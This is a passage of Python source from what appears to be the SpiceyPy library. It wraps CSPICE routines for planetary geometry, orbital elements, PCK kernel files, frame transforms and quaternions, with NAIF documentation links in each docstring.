    libspice.npelpt_c(stypes.toDoubleVector(point), ctypes.byref(ellips),
                      pnear, ctypes.byref(dist))
    return stypes.cVectorToPython(pnear), dist.value
@spiceErrorCheck
def nplnpt(linpt, lindir, point):
    """
    Find the nearest point on a line to a specified point,
    together with the distance between the two points.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/nplnpt_c.html

    :param linpt: Point on a line
    :type linpt: 3-Element Array of floats
    :param lindir: line's direction vector
    :type lindir: 3-Element Array of floats
    :param point: A second point.
    :type point: 3-Element Array of floats
    :return:
            Nearest point on the line to point,
            Distance between point and pnear
    :rtype: tuple
    """
    pnear = stypes.emptyDoubleVector(3)
    dist = ctypes.c_double()
    libspice.nplnpt_c(stypes.toDoubleVector(linpt),
                      stypes.toDoubleVector(lindir),
                      stypes.toDoubleVector(point), pnear,
                      ctypes.byref(dist))
    return stypes.cVectorToPython(pnear), dist.value
@spiceErrorCheck
def nvc2pl(normal, constant):
    """
    Construct a SPICE plane from a normal vector and a constant.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/nvc2pl_c.html

    :param normal: A normal vector defining a plane.
    :type normal: 3-Element Array of floats
    :param constant: A constant defining a plane.
    :type constant: float
    :return: plane
    :rtype: spiceypy.utils.support_types.Plane
    """
    plane = stypes.Plane()
    libspice.nvc2pl_c(stypes.toDoubleVector(normal),
                      ctypes.c_double(constant), ctypes.byref(plane))
    return plane
@spiceErrorCheck
def nvp2pl(normal, point):
    """
    Construct a SPICE plane from a normal vector and a point.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/nvp2pl_c.html

    :param normal: A normal vector defining a plane.
    :type normal: 3-Element Array of floats
    :param point: A point defining a plane.
    :type point: 3-Element Array of floats
    :return: plane
    :rtype: spiceypy.utils.support_types.Plane
    """
    plane = stypes.Plane()
    libspice.nvp2pl_c(stypes.toDoubleVector(normal),
                      stypes.toDoubleVector(point), ctypes.byref(plane))
    return plane
################################################################################
# O
@spiceErrorCheck
def occult(target1, shape1, frame1, target2, shape2, frame2, abcorr, observer,
           et):
    """
    Determine the occultation condition (not occulted, partially,
    etc.) of one target relative to another target as seen by
    an observer at a given time.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/occult_c.html

    :param target1: Name or ID of first target.
    :type target1: str
    :param shape1: Type of shape model used for first target.
    :type shape1: str
    :param frame1: Body-fixed, body-centered frame for first body.
    :type frame1: str
    :param target2: Name or ID of second target.
    :type target2: str
    :param shape2: Type of shape model used for second target.
    :type shape2: str
    :param frame2: Body-fixed, body-centered frame for second body.
    :type frame2: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param observer: Name or ID of the observer.
    :type observer: str
    :param et: Time of the observation (seconds past J2000).
    :type et: float
    :return: Occultation identification code.
    :rtype: int
    """
    occult_code = ctypes.c_int()
    libspice.occult_c(stypes.stringToCharP(target1),
                      stypes.stringToCharP(shape1),
                      stypes.stringToCharP(frame1),
                      stypes.stringToCharP(target2),
                      stypes.stringToCharP(shape2),
                      stypes.stringToCharP(frame2),
                      stypes.stringToCharP(abcorr),
                      stypes.stringToCharP(observer),
                      ctypes.c_double(et), ctypes.byref(occult_code))
    return occult_code.value
@spiceErrorCheck
def ordc(item, inset):
    """
    Return the ordinal position of a given item in a character set,
    or -1 if the item does not appear in the set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ordc_c.html

    :param item: An item to locate within a set.
    :type item: str
    :param inset: A set to search for a given item.
    :type inset: SpiceCharCell
    :return: the ordinal position of item within the set
    :rtype: int
    """
    assert isinstance(inset, stypes.SpiceCell)
    assert inset.is_char()
    assert isinstance(item, str)
    return libspice.ordc_c(stypes.stringToCharP(item), ctypes.byref(inset))
@spiceErrorCheck
def ordd(item, inset):
    """
    Return the ordinal position of a given item in a double precision
    set, or -1 if the item does not appear in the set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ordd_c.html

    :param item: An item to locate within a set.
    :type item: float
    :param inset: A set to search for a given item.
    :type inset: SpiceDoubleCell
    :return: the ordinal position of item within the set
    :rtype: int
    """
    assert isinstance(inset, stypes.SpiceCell)
    assert inset.is_double()
    return libspice.ordd_c(ctypes.c_double(item), ctypes.byref(inset))
@spiceErrorCheck
def ordi(item, inset):
    """
    Return the ordinal position of a given item in an integer set,
    or -1 if the item does not appear in the set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ordi_c.html

    :param item: An item to locate within a set.
    :type item: int
    :param inset: A set to search for a given item.
    :type inset: SpiceIntCell
    :return: the ordinal position of item within the set
    :rtype: int
    """
    assert isinstance(inset, stypes.SpiceCell)
    assert inset.is_int()
    assert isinstance(item, int)
    return libspice.ordi_c(ctypes.c_int(item), ctypes.byref(inset))
@spiceErrorCheck
def orderc(array, ndim=None):
    """
    Determine the order of elements in an array of character strings.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/orderc_c.html

    :param array: Input array.
    :type array: Array of strings.
    :param ndim: Optional Length of input array
    :type ndim: int
    :return: Order vector for array.
    :rtype: array of ints
    """
    c_ndim = ctypes.c_int(len(array) if ndim is None else ndim)
    # Row length is the longest string plus the terminating null.
    c_lenvals = ctypes.c_int(len(max(array, key=len)) + 1)
    iorder = stypes.emptyIntVector(c_ndim)
    c_array = stypes.listToCharArray(array, c_lenvals, c_ndim)
    libspice.orderc_c(c_lenvals, c_array, c_ndim, iorder)
    return stypes.cVectorToPython(iorder)
@spiceErrorCheck
def orderd(array, ndim=None):
    """
    Determine the order of elements in a double precision array.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/orderd_c.html

    :param array: Input array.
    :type array: Array of floats
    :param ndim: Optional Length of input array
    :type ndim: int
    :return: Order vector for array.
    :rtype: array of ints
    """
    c_ndim = ctypes.c_int(len(array) if ndim is None else ndim)
    iorder = stypes.emptyIntVector(c_ndim)
    libspice.orderd_c(stypes.toDoubleVector(array), c_ndim, iorder)
    return stypes.cVectorToPython(iorder)
@spiceErrorCheck
def orderi(array, ndim=None):
    """
    Determine the order of elements in an integer array.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/orderi_c.html

    :param array: Input array.
    :type array: Array of ints
    :param ndim: Optional Length of input array
    :type ndim: int
    :return: Order vector for array.
    :rtype: array of ints
    """
    c_ndim = ctypes.c_int(len(array) if ndim is None else ndim)
    iorder = stypes.emptyIntVector(c_ndim)
    libspice.orderi_c(stypes.toIntVector(array), c_ndim, iorder)
    return stypes.cVectorToPython(iorder)
@spiceErrorCheck
def oscelt(state, et, mu):
    """
    Determine the set of osculating conic orbital elements that
    corresponds to the state (position, velocity) of a body at
    some epoch.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/oscelt_c.html

    :param state: State of body at epoch of elements.
    :type state: Float Array of 6 elements.
    :param et: Epoch of elements.
    :type et: float
    :param mu: Gravitational parameter (GM) of primary body.
    :type mu: float
    :return: Equivalent conic elements
    :rtype: Float Array of 8 elements.
    """
    elts = stypes.emptyDoubleVector(8)
    libspice.oscelt_c(stypes.toDoubleVector(state), ctypes.c_double(et),
                      ctypes.c_double(mu), elts)
    return stypes.cVectorToPython(elts)
@spiceErrorCheck
def oscltx(state, et, mu):
    """
    Determine the set of osculating conic orbital elements that
    corresponds to the state (position, velocity) of a body at some
    epoch. In additional to the classical elements, return the true
    anomaly, semi-major axis, and period, if applicable.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/oscltx_c.html

    :param state: State of body at epoch of elements.
    :type state: 6-Element Array of floats
    :param et: Epoch of elements.
    :type et: float
    :param mu: Gravitational parameter (GM) of primary body.
    :type mu: float
    :return: Extended set of classical conic elements.
    """
    # NOTE: the @spiceErrorCheck decorator was missing here, unlike every
    # other wrapper in this module; without it SPICE errors raised by
    # oscltx_c would go unreported.
    state = stypes.toDoubleVector(state)
    et = ctypes.c_double(et)
    mu = ctypes.c_double(mu)
    # oscltx_c fills a 20-element array of which only the leading
    # elements are defined; keep the first 11 as before.
    elts = stypes.emptyDoubleVector(20)
    libspice.oscltx_c(state, et, mu, elts)
    return stypes.cVectorToPython(elts)[0:11]
################################################################################
# P
@spiceErrorCheck
def pckcls(handle):
    """
    Close an open PCK file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckcls_c.html

    :param handle: Handle of the PCK file to be closed.
    :type handle: int
    """
    libspice.pckcls_c(ctypes.c_int(handle))
@spiceErrorCheck
def pckcov(pck, idcode, cover):
    """
    Find the coverage window for a specified reference frame in a
    specified binary PCK file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckcov_c.html

    :param pck: Name of PCK file.
    :type pck: str
    :param idcode: Class ID code of PCK reference frame.
    :type idcode: int
    :param cover: Window giving coverage in pck for idcode.
    :type cover: SpiceCell
    """
    assert isinstance(cover, stypes.SpiceCell)
    assert cover.dtype == 1
    libspice.pckcov_c(stypes.stringToCharP(pck), ctypes.c_int(idcode),
                      ctypes.byref(cover))
@spiceErrorCheck
def pckfrm(pck, ids):
    """
    Find the set of reference frame class ID codes of all frames
    in a specified binary PCK file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckfrm_c.html

    :param pck: Name of PCK file.
    :type pck: str
    :param ids: Set of frame class ID codes of frames in PCK file.
    :type ids: SpiceCell
    """
    assert isinstance(ids, stypes.SpiceCell)
    assert ids.dtype == 2
    libspice.pckfrm_c(stypes.stringToCharP(pck), ctypes.byref(ids))
@spiceErrorCheck
def pcklof(filename):
    """
    Load a binary PCK file for use by the readers, returning the
    handle by which other PCK routines refer to the loaded file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pcklof_c.html

    :param filename: Name of the file to be loaded.
    :type filename: str
    :return: Loaded file's handle.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.pcklof_c(stypes.stringToCharP(filename), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def pckopn(name, ifname, ncomch):
    """
    Create a new PCK file, returning the handle of the opened file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckopn_c.html

    :param name: The name of the PCK file to be opened.
    :type name: str
    :param ifname: The internal filename for the PCK.
    :type ifname: str
    :param ncomch: The number of characters to reserve for comments.
    :type ncomch: int
    :return: The handle of the opened PCK file.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.pckopn_c(stypes.stringToCharP(name),
                      stypes.stringToCharP(ifname),
                      ctypes.c_int(ncomch), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def pckuof(handle):
    """
    Unload a binary PCK file so that it will no longer be searched by
    the readers.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckuof_c.html

    :param handle: Handle of PCK file to be unloaded
    :type handle: int
    """
    libspice.pckuof_c(ctypes.c_int(handle))
@spiceErrorCheck
def pckw02(handle, classid, frname, first, last, segid, intlen, n, polydg, cdata, btime):
    """
    Write a type 2 segment to a PCK binary file given the file handle,
    frame class ID, base frame, time range covered by the segment, and
    the Chebyshev polynomial coefficients.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckw02_c.html

    :param handle: Handle of binary PCK file open for writing.
    :type handle: int
    :param classid: Frame class ID of body-fixed frame.
    :type classid: int
    :param frname: Name of base reference frame.
    :type frname: str
    :param first: Start time of interval covered by segment.
    :type first: float
    :param last: End time of interval covered by segment.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param intlen: Length of time covered by logical record.
    :type intlen: float
    :param n: Number of logical records in segment.
    :type n: int
    :param polydg: Chebyshev polynomial degree.
    :type polydg: int
    :param cdata: Array of Chebyshev coefficients.
    :type cdata: N-Element Array of floats
    :param btime: Begin time of first logical record.
    :type btime: float
    """
    libspice.pckw02_c(ctypes.c_int(handle), ctypes.c_int(classid),
                      stypes.stringToCharP(frname), ctypes.c_double(first),
                      ctypes.c_double(last), stypes.stringToCharP(segid),
                      ctypes.c_double(intlen), ctypes.c_int(n),
                      ctypes.c_int(polydg), stypes.toDoubleVector(cdata),
                      ctypes.c_double(btime))
@spiceErrorCheck
def pcpool(name, cvals):
    """
    Programmatically insert character data into the kernel pool.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pcpool_c.html

    :param name: The kernel pool name to associate with cvals.
    :type name: str
    :param cvals: An array of strings to insert into the kernel pool.
    :type cvals: Array of str
    """
    c_name = stypes.stringToCharP(name)
    # Row length is the longest string plus the terminating null.
    c_lenvals = ctypes.c_int(len(max(cvals, key=len)) + 1)
    c_n = ctypes.c_int(len(cvals))
    c_cvals = stypes.listToCharArray(cvals, c_lenvals, c_n)
    libspice.pcpool_c(c_name, c_n, c_lenvals, c_cvals)
@spiceErrorCheck
def pdpool(name, dvals):
    """
    Programmatically insert double precision data into the kernel pool.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pdpool_c.html

    :param name: The kernel pool name to associate with dvals.
    :type name: str
    :param dvals: An array of values to insert into the kernel pool.
    :type dvals: Array of floats
    """
    libspice.pdpool_c(stypes.stringToCharP(name),
                      ctypes.c_int(len(dvals)),
                      stypes.toDoubleVector(dvals))
@spiceErrorCheck
def pgrrec(body, lon, lat, alt, re, f):
    """
    Convert planetographic coordinates to rectangular coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pgrrec_c.html

    :param body: Body with which coordinate system is associated.
    :type body: str
    :param lon: Planetographic longitude of a point (radians).
    :type lon: float
    :param lat: Planetographic latitude of a point (radians).
    :type lat: float
    :param alt: Altitude of a point above reference spheroid.
    :type alt: float
    :param re: Equatorial radius of the reference spheroid.
    :type re: float
    :param f: Flattening coefficient.
    :type f: float
    :return: Rectangular coordinates of the point.
    :rtype: 3-Element Array of floats
    """
    rectan = stypes.emptyDoubleVector(3)
    libspice.pgrrec_c(stypes.stringToCharP(body), ctypes.c_double(lon),
                      ctypes.c_double(lat), ctypes.c_double(alt),
                      ctypes.c_double(re), ctypes.c_double(f), rectan)
    return stypes.cVectorToPython(rectan)
@spiceErrorCheck
def phaseq(et, target, illmn, obsrvr, abcorr):
    """
    Compute the apparent phase angle for a target, observer,
    illuminator set of ephemeris objects.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/phaseq_c.html

    :param et: Ephemeris seconds past J2000 TDB.
    :type et: float
    :param target: Target body name.
    :type target: str
    :param illmn: Illuminating body name.
    :type illmn: str
    :param obsrvr: Observer body.
    :type obsrvr: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :return: Value of phase angle.
    :rtype: float
    """
    return libspice.phaseq_c(ctypes.c_double(et),
                             stypes.stringToCharP(target),
                             stypes.stringToCharP(illmn),
                             stypes.stringToCharP(obsrvr),
                             stypes.stringToCharP(abcorr))
@spiceErrorCheck
def pi():
    """
    Return the value of pi, the ratio of a circle's circumference to
    its diameter, as computed by the SPICE toolkit.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pi_c.html

    :return: value of pi.
    :rtype: float
    """
    return libspice.pi_c()
@spiceErrorCheck
def pipool(name, ivals):
    """
    Programmatically insert integer data into the kernel pool.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pipool_c.html

    :param name: The kernel pool name to associate with values.
    :type name: str
    :param ivals: An array of integers to insert into the pool.
    :type ivals: Array of ints
    """
    libspice.pipool_c(stypes.stringToCharP(name),
                      ctypes.c_int(len(ivals)),
                      stypes.toIntVector(ivals))
@spiceErrorCheck
def pjelpl(elin, plane):
    """
    Project an ellipse onto a plane, orthogonally.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pjelpl_c.html

    :param elin: A SPICE ellipse to be projected.
    :type elin: spiceypy.utils.support_types.Ellipse
    :param plane: A plane onto which elin is to be projected.
    :type plane: supporttypes.Plane
    :return: A SPICE ellipse resulting from the projection.
    :rtype: spiceypy.utils.support_types.Ellipse
    """
    assert isinstance(elin, stypes.Ellipse)
    assert isinstance(plane, stypes.Plane)
    projected = stypes.Ellipse()
    libspice.pjelpl_c(ctypes.byref(elin), ctypes.byref(plane),
                      ctypes.byref(projected))
    return projected
@spiceErrorCheck
def pl2nvc(plane):
    """
    Return a unit normal vector and constant that define a specified plane.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pl2nvc_c.html

    :param plane: A SPICE plane (stypes.Plane).
    :return: A normal vector and constant defining the geometric plane
        represented by plane.
    :rtype: tuple
    """
    assert isinstance(plane, stypes.Plane)
    unit_normal = stypes.emptyDoubleVector(3)
    plane_constant = ctypes.c_double()
    libspice.pl2nvc_c(ctypes.byref(plane), unit_normal,
                      ctypes.byref(plane_constant))
    return stypes.cVectorToPython(unit_normal), plane_constant.value
@spiceErrorCheck
def pl2nvp(plane):
    """
    Return a unit normal vector and point that define a specified plane.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pl2nvp_c.html

    :param plane: A SPICE plane (stypes.Plane).
    :return: A unit normal vector and point that define plane.
    :rtype: tuple
    """
    assert isinstance(plane, stypes.Plane)
    unit_normal = stypes.emptyDoubleVector(3)
    plane_point = stypes.emptyDoubleVector(3)
    libspice.pl2nvp_c(ctypes.byref(plane), unit_normal, plane_point)
    return (stypes.cVectorToPython(unit_normal),
            stypes.cVectorToPython(plane_point))
@spiceErrorCheck
def pl2psv(plane):
    """
    Return a point and two orthogonal spanning vectors that generate
    a specified plane.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pl2psv_c.html

    :param plane: A SPICE plane (stypes.Plane).
    :return: A point in the input plane and two vectors
        spanning the input plane.
    :rtype: tuple
    """
    assert isinstance(plane, stypes.Plane)
    plane_point = stypes.emptyDoubleVector(3)
    first_span = stypes.emptyDoubleVector(3)
    second_span = stypes.emptyDoubleVector(3)
    libspice.pl2psv_c(ctypes.byref(plane), plane_point, first_span,
                      second_span)
    return (stypes.cVectorToPython(plane_point),
            stypes.cVectorToPython(first_span),
            stypes.cVectorToPython(second_span))
@spiceErrorCheck
def pltar(vrtces, plates):
    """
    Compute the total area of a collection of triangular plates.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pltar_c.html

    :param vrtces: Array of vertices (Nx3 floats).
    :param plates: Array of plates (Nx3 ints).
    :return: total area of the set of plates
    :rtype: float
    """
    # Capture both lengths before the Python sequences are converted
    # to C matrices.
    nvertices = ctypes.c_int(len(vrtces))
    nplates = ctypes.c_int(len(plates))
    return libspice.pltar_c(nvertices, stypes.toDoubleMatrix(vrtces),
                            nplates, stypes.toIntMatrix(plates))
@spiceErrorCheck
def pltexp(iverts, delta):
    """
    Expand a triangular plate by a specified amount. The expanded
    plate is co-planar with, and has the same orientation as, the
    original. The centroids of the two plates coincide.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pltexp_c.html

    :param iverts: Vertices of the plate to be expanded (3x3 floats).
    :param delta: Fraction by which the plate is to be expanded (float).
    :return: Vertices of the expanded plate.
    :rtype: 3x3-Element Array of floats
    """
    expanded = stypes.emptyDoubleMatrix()
    libspice.pltexp_c(stypes.toDoubleMatrix(iverts),
                      ctypes.c_double(delta), expanded)
    return stypes.cMatrixToNumpy(expanded)
@spiceErrorCheck
def pltnp(point, v1, v2, v3):
    """
    Find the nearest point on a triangular plate to a given point.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pltnp_c.html

    :param point: A point in 3-dimensional space (3 floats).
    :param v1: First vertex of a triangular plate (3 floats).
    :param v2: Second vertex of a triangular plate (3 floats).
    :param v3: Third vertex of a triangular plate (3 floats).
    :return: the nearest point on a triangular plate to a given point
        and the distance to it.
    :rtype: tuple
    """
    nearest = stypes.emptyDoubleVector(3)
    distance = ctypes.c_double()
    libspice.pltnp_c(stypes.toDoubleVector(point),
                     stypes.toDoubleVector(v1),
                     stypes.toDoubleVector(v2),
                     stypes.toDoubleVector(v3),
                     nearest, ctypes.byref(distance))
    return stypes.cVectorToPython(nearest), distance.value
@spiceErrorCheck
def pltnrm(v1, v2, v3):
    """
    Compute an outward normal vector of a triangular plate.
    The vector does not necessarily have unit length.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pltnrm_c.html

    :param v1: First vertex of a plate (3 floats).
    :param v2: Second vertex of a plate (3 floats).
    :param v3: Third vertex of a plate (3 floats).
    :return: Plate's outward normal vector.
    :rtype: 3-Element Array of floats
    """
    outward_normal = stypes.emptyDoubleVector(3)
    libspice.pltnrm_c(stypes.toDoubleVector(v1),
                      stypes.toDoubleVector(v2),
                      stypes.toDoubleVector(v3),
                      outward_normal)
    return stypes.cVectorToPython(outward_normal)
@spiceErrorCheck
def pltvol(vrtces, plates):
    """
    Compute the volume of a three-dimensional region bounded by a
    collection of triangular plates.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pltvol_c.html

    :param vrtces: Array of vertices (Nx3 floats).
    :param plates: Array of plates (Nx3 ints).
    :return: the volume of the spatial region bounded by the plates.
    :rtype: float
    """
    # Capture both lengths before the Python sequences are converted
    # to C matrices.
    nvertices = ctypes.c_int(len(vrtces))
    nplates = ctypes.c_int(len(plates))
    return libspice.pltvol_c(nvertices, stypes.toDoubleMatrix(vrtces),
                             nplates, stypes.toIntMatrix(plates))
@spiceErrorCheck
def polyds(coeffs, deg, nderiv, t):
    """
    Compute the value of a polynomial and its first
    nderiv derivatives at the value t.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/polyds_c.html

    :param coeffs: Coefficients of the polynomial to be evaluated.
    :type coeffs: N-Element Array of floats
    :param deg: Degree of the polynomial to be evaluated.
    :type deg: int
    :param nderiv: Number of derivatives to compute.
    :type nderiv: int
    :param t: Point to evaluate the polynomial and derivatives
    :type t: float
    :return: Value of polynomial and derivatives.
    :rtype: nderiv-Element Array of floats
    """
    coeffs = stypes.toDoubleVector(coeffs)
    deg = ctypes.c_int(deg)
    # Output holds the value plus nderiv derivatives; size it before
    # nderiv is rebound to its ctypes form.
    p = stypes.emptyDoubleVector(nderiv + 1)
    nderiv = ctypes.c_int(nderiv)
    t = ctypes.c_double(t)
    # Pass the coefficient array directly: a ctypes array already decays
    # to the ConstSpiceDouble* that polyds_c expects. Wrapping it in
    # ctypes.byref() yields a pointer-to-array, which does not match the
    # declared pointer argtype.
    libspice.polyds_c(coeffs, deg, nderiv, t, p)
    return stypes.cVectorToPython(p)
@spiceErrorCheck
def pos(string, substr, start):
    """
    Find the first occurrence in a string of a substring, starting at
    a specified location, searching forward.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pos_c.html

    :param string: Any character string (str).
    :param substr: Substring to locate in the character string (str).
    :param start: Position to begin looking for substr in string (int).
    :return: The index of the first occurrence of substr
        in string at or following index start.
    :rtype: int
    """
    return libspice.pos_c(stypes.stringToCharP(string),
                          stypes.stringToCharP(substr),
                          ctypes.c_int(start))
@spiceErrorCheck
def posr(string, substr, start):
    """
    Find the first occurrence in a string of a substring, starting at
    a specified location, searching backward.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/posr_c.html

    :param string: Any character string (str).
    :param substr: Substring to locate in the character string (str).
    :param start: Position to begin looking for substr in string (int).
    :return: The index of the last occurrence of substr
        in string at or preceding index start.
    :rtype: int
    """
    return libspice.posr_c(stypes.stringToCharP(string),
                           stypes.stringToCharP(substr),
                           ctypes.c_int(start))
# prompt,
# skip for no as this is not really an important function for python users
@spiceErrorCheck
def prop2b(gm, pvinit, dt):
    """
    Given a central mass and the state of massless body at time t_0,
    this routine determines the state as predicted by a two-body
    force model at time t_0 + dt.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/prop2b_c.html

    :param gm: Gravity of the central mass (float).
    :param pvinit: Initial state from which to propagate a state (6 floats).
    :param dt: Time offset from initial state to propagate to (float).
    :return: The propagated state.
    :rtype: 6-Element Array of floats
    """
    propagated = stypes.emptyDoubleVector(6)
    libspice.prop2b_c(ctypes.c_double(gm),
                      stypes.toDoubleVector(pvinit),
                      ctypes.c_double(dt),
                      propagated)
    return stypes.cVectorToPython(propagated)
@spiceErrorCheck
def prsdp(string):
    """
    Parse a string as a double precision number, encapsulating error handling.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/prsdp_c.html

    :param string: String representing a d.p. number (str).
    :return: D.p. value obtained by parsing string.
    :rtype: float
    """
    parsed = ctypes.c_double()
    libspice.prsdp_c(stypes.stringToCharP(string), ctypes.byref(parsed))
    return parsed.value
@spiceErrorCheck
def prsint(string):
    """
    Parse a string as an integer, encapsulating error handling.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/prsint_c.html

    :param string: String representing an integer (str).
    :return: Integer value obtained by parsing string.
    :rtype: int
    """
    parsed = ctypes.c_int()
    libspice.prsint_c(stypes.stringToCharP(string), ctypes.byref(parsed))
    return parsed.value
@spiceErrorCheck
def psv2pl(point, span1, span2):
    """
    Make a CSPICE plane from a point and two spanning vectors.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/psv2pl_c.html

    :param point: A Point (3 floats).
    :param span1: First Spanning vector (3 floats).
    :param span2: Second Spanning vector (3 floats).
    :return: A SPICE plane.
    :rtype: supportypes.Plane
    """
    result_plane = stypes.Plane()
    libspice.psv2pl_c(stypes.toDoubleVector(point),
                      stypes.toDoubleVector(span1),
                      stypes.toDoubleVector(span2),
                      ctypes.byref(result_plane))
    return result_plane
# skip putcml, is this really needed for python users?
@spiceErrorCheck
def pxform(fromstr, tostr, et):
    """
    Return the matrix that transforms position vectors from one
    specified frame to another at a specified epoch.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pxform_c.html

    :param fromstr: Name of the frame to transform from (str).
    :param tostr: Name of the frame to transform to (str).
    :param et: Epoch of the rotation matrix (float).
    :return: A rotation matrix.
    :rtype: 3x3 Element Array of floats
    """
    rotation = stypes.emptyDoubleMatrix()
    libspice.pxform_c(stypes.stringToCharP(fromstr),
                      stypes.stringToCharP(tostr),
                      ctypes.c_double(et),
                      rotation)
    return stypes.cMatrixToNumpy(rotation)
@spiceErrorCheck
def pxfrm2(frame_from, frame_to, etfrom, etto):
    """
    Return the 3x3 matrix that transforms position vectors from one
    specified frame at a specified epoch to another specified
    frame at another specified epoch.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pxfrm2_c.html

    :param frame_from: Name of the frame to transform from (str).
    :param frame_to: Name of the frame to transform to (str).
    :param etfrom: Evaluation time of frame_from (float).
    :param etto: Evaluation time of frame_to (float).
    :return: A position transformation matrix from frame_from to frame_to
    :rtype: 3x3 Element Array of floats
    """
    transform = stypes.emptyDoubleMatrix()
    libspice.pxfrm2_c(stypes.stringToCharP(frame_from),
                      stypes.stringToCharP(frame_to),
                      ctypes.c_double(etfrom),
                      ctypes.c_double(etto),
                      transform)
    return stypes.cMatrixToNumpy(transform)
################################################################################
# Q
@spiceErrorCheck
def q2m(q):
    """
    Find the rotation matrix corresponding to a specified unit quaternion.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/q2m_c.html

    :param q: A unit quaternion (4 floats).
    :return: A rotation matrix corresponding to q
    :rtype: 3x3-Element Array of floats
    """
    rotation = stypes.emptyDoubleMatrix()
    libspice.q2m_c(stypes.toDoubleVector(q), rotation)
    return stypes.cMatrixToNumpy(rotation)
# @spiceErrorCheck
# NOTE(review): the decorator above is deliberately commented out — this
# routine is part of the error-reporting path itself, so wrapping it in
# the error check appears intentional to avoid; confirm before enabling.
def qcktrc(tracelen=_default_len_out):
    """
    Return a string containing a traceback.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/qcktrc_c.html

    :param tracelen: Maximum length of output traceback string.
    :type tracelen: int
    :return: A traceback string.
    :rtype: str
    """
    # Allocate an output buffer of tracelen characters, then convert the
    # length itself for the C call.
    tracestr = stypes.stringToCharP(tracelen)
    tracelen = ctypes.c_int(tracelen)
    libspice.qcktrc_c(tracelen, tracestr)
    return stypes.toPythonString(tracestr)
@spiceErrorCheck
def qdq2av(q, dq):
    """
    Derive angular velocity from a unit quaternion and its derivative
    with respect to time.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/qdq2av_c.html

    :param q: Unit SPICE quaternion (4 floats).
    :param dq: Derivative of q with respect to time (4 floats).
    :return: Angular velocity defined by q and dq.
    :rtype: 3-Element Array of floats
    """
    angular_velocity = stypes.emptyDoubleVector(3)
    libspice.qdq2av_c(stypes.toDoubleVector(q),
                      stypes.toDoubleVector(dq),
                      angular_velocity)
    return stypes.cVectorToPython(angular_velocity)
@spiceErrorCheck
def qxq(q1, q2):
    """
    Multiply two quaternions.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/qxq_c.html

    :param q1: First SPICE quaternion (4 floats).
    :param q2: Second SPICE quaternion (4 floats).
    :return: Product of q1 and q2.
    :rtype: 4-Element Array of floats
    """
    product = stypes.emptyDoubleVector(4)
    libspice.qxq_c(stypes.toDoubleVector(q1),
                   stypes.toDoubleVector(q2),
                   product)
    return stypes.cVectorToPython(product)
################################################################################
# R
@spiceErrorCheck
def radrec(inrange, re, dec):
    """
    Convert from range, right ascension, and declination to rectangular
    coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/radrec_c.html

    :param inrange: Distance of a point from the origin (float).
    :param re: Right ascension of point in radians (float).
    :param dec: Declination of point in radians (float).
    :return: Rectangular coordinates of the point.
